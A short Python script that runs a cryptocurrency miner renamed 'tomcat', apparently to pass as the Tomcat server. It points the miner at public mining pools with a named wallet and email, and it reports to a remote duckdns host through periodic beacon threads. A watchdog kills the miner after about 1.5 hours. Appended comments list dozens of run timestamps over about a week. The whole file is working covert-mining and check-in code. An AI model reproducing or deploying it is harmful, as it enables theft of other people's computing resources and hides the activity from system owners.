import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:29:03.691050
#2018-02-17 17:17:01.703312
#2018-02-17 19:05:04.747202
#2018-02-17 20:53:04.192291
#2018-02-17 22:40:08.232665
#2018-02-18 00:23:06.196570
#2018-02-18 02:14:03.518166
#2018-02-18 04:01:05.232731
#2018-02-18 05:49:06.411690
#2018-02-18 07:41:07.348633
#2018-02-18 09:28:05.235034
#2018-02-18 11:14:07.040898
#2018-02-18 13:01:05.100900
#2018-02-18 14:48:05.178176
#2018-02-18 16:35:06.859787
#2018-02-18 18:24:05.180414
#2018-02-18 20:11:07.169706
#2018-02-18 21:56:05.887788
#2018-02-18 23:45:04.090605
#2018-02-19 01:31:05.367551
#2018-02-19 03:19:06.843635
#2018-02-19 05:05:03.544706
#2018-02-19 06:51:03.932130
#2018-02-19 08:39:07.823205
#2018-02-19 10:28:05.607423
#2018-02-19 12:16:06.930101
#2018-02-19 14:02:07.360196
#2018-02-19 15:52:07.701064
#2018-02-19 17:40:04.609556
#2018-02-19 19:27:06.868927
#2018-02-19 21:16:03.868072
#2018-02-19 23:02:01.356719
#2018-02-20 00:47:06.409161
#2018-02-20 02:35:04.513011
#2018-02-20 04:24:04.253728
#2018-02-20 06:08:07.154852
#2018-02-20 07:53:08.588512
#2018-02-20 09:39:03.834441
#2018-02-20 11:22:09.213784
#2018-02-20 13:08:09.596747
#2018-02-20 14:54:09.158750
#2018-02-20 16:40:01.361454
#2018-02-20 18:27:07.499904
#2018-02-20 20:20:01.418735
#2018-02-20 22:05:04.215398
#2018-02-20 23:46:07.865923
#2018-02-21 01:33:05.786474
#2018-02-21 03:20:09.407072
#2018-02-21 05:09:06.223903
#2018-02-21 06:57:05.420208
#2018-02-21 08:44:14.009557
#2018-02-21 10:32:06.688161
#2018-02-21 12:19:06.362164
#2018-02-21 14:06:04.081679
#2018-02-21 15:51:08.651449
#2018-02-21 17:42:06.979328
#2018-02-21 19:29:06.759139
#2018-02-21 21:17:06.429183
#2018-02-21 23:05:06.011284
#2018-02-22 00:55:03.524522
#2018-02-22 02:43:05.519259
#2018-02-22 04:29:06.180124
#2018-02-22 06:15:08.149148
#2018-02-22 08:01:04.409389
#2018-02-22 09:49:01.372837
#2018-02-22 11:33:07.515657
#2018-02-22 13:20:08.048317
#2018-02-22 15:08:08.532727
#2018-02-22 16:51:14.381734
#2018-02-22 18:39:07.793494
#2018-02-22 20:32:08.230277
#2018-02-22 22:17:08.255647
#2018-02-23 00:05:03.032379
#2018-02-23 01:52:04.902731
#2018-02-23 03:41:03.681021
#2018-02-23 05:26:01.429616
#2018-02-23 07:11:07.942671
#2018-02-23 09:16:05.349336
#2018-02-23 11:22:05.671117
#2018-02-23 13:12:05.933498
#2018-02-23 14:56:01.663377
#2018-02-23 16:44:04.592626
#2018-02-23 18:31:08.598014
#2018-02-23 20:19:01.815487
#2018-02-23 22:07:03.824333
#2018-02-23 23:55:08.445895
#2018-02-24 01:45:09.052124
#2018-02-24 03:33:05.612174
#2018-02-24 05:17:08.434598
#2018-02-24 07:07:05.611169
#2018-02-24 08:56:01.634936
#2018-02-24 10:39:05.443451
#2018-02-24 12:25:03.491006
#2018-02-24 14:17:06.387661
#2018-02-24 16:03:01.909533
#2018-02-24 17:55:03.829795
#2018-02-24 19:42:06.690246
#2018-02-24 21:29:01.987297
#2018-02-25 01:55:08.119591
#2018-02-25 05:44:04.192609
#2018-02-25 11:36:07.779022